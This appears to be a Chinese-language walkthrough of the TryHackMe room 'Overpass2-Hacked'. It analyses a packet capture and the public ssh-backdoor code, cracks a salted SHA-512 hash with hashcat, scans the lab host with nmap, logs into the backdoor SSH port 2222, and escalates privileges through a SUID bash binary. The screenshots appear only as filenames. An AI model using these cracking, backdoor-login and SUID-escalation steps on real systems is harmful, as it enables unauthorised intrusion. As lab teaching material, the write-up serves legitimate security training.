【THM】Overpass2-Hacked-Practice

Forensics - Analyse the PCAP

Overpass服务器被黑了!公司的SOC 团队注意到一个深夜的可疑攻击活动,并设法捕获到了黑客攻击发生时相关的数据包文件。

你能弄清楚攻击者是如何进入的,并入侵到Overpass的生产服务器吗?

image-20240127085729657

image-20240127085747889

攻击者使用什么有效负载来获取访问权限?

image-20240127090221281

What password did the attacker use to privesc?

image-20240127090405630

image-20240127090501760

image-20240127090454476

可以看到这里有五行数据

image-20240127091418090

Using the fasttrack wordlist, how many of the system passwords were crackable?

image-20240127091601056

Research - Analyse the code

https://github.com/NinjaJc01/ssh-backdoor/

image-20240127092605922

image-20240127092815664

image-20240127092839090

image-20240127092853983

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

Possible Hashs:
[+] SHA-512
[+] Whirlpool

Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------
 HASH:

然后查找

image-20240127093320973

应该是1710

要破解哈希,我们需要提供在数据包捕获文件中找到的攻击者所使用的 SHA-512 哈希值和在后门代码 main.go 文件中找到的硬编码盐值(最终需提供的内容为hash:salt形式),我们将 hash:salt 内容添加到一个txt文件中,然后使用 hashcat 命令针对该txt文件来破解哈希。

1
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
1
>hashcat.exe  -m 1710 -a 0 hash.txt rockyou.txt

image-20240127093721863

Attack - Get back in!

1
nmap -p- -sC -sV -T4 10.10.240.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Nmap scan report for 10.10.240.3
Host is up (0.20s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问80

image-20240127100026462

从上面的nmap扫描结果可以看到目标机的22、2222端口都有SSH服务在运行,根据目前收集到的信息,尝试使用之前在分析 PCAP 文件时所看到的帐户原始密码以用户 james 的身份进行ssh登录,结果登录端口 22 和 2222 的ssh连接都失败了,尝试使用上一小节通过破解 SHA-512 哈希所得到的密码,结果登录端口 22 的ssh连接失败但是登录端口 2222 的ssh连接成功(根据后门工具对应github项目中的main.go文件内容也可知后门端口为2222)。

1
ssh james@10.10.240.3 -p 2222
1
ssh james@10.10.240.3 -p 2222 -o HostKeyAlgorithms=+ssh-rsa

image-20240127103424392

可以看到有一个.suid_bash

image-20240127104427040

image-20240127104447478

1
2
3
4
5
james@overpass-production:/home/james$ file .suid_bash 

.suid_bash: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=12f73d7a8e226c663034529c8dd20efec22dde54, stripped

james@overpass-production:/home/james$ ./.suid_bash -p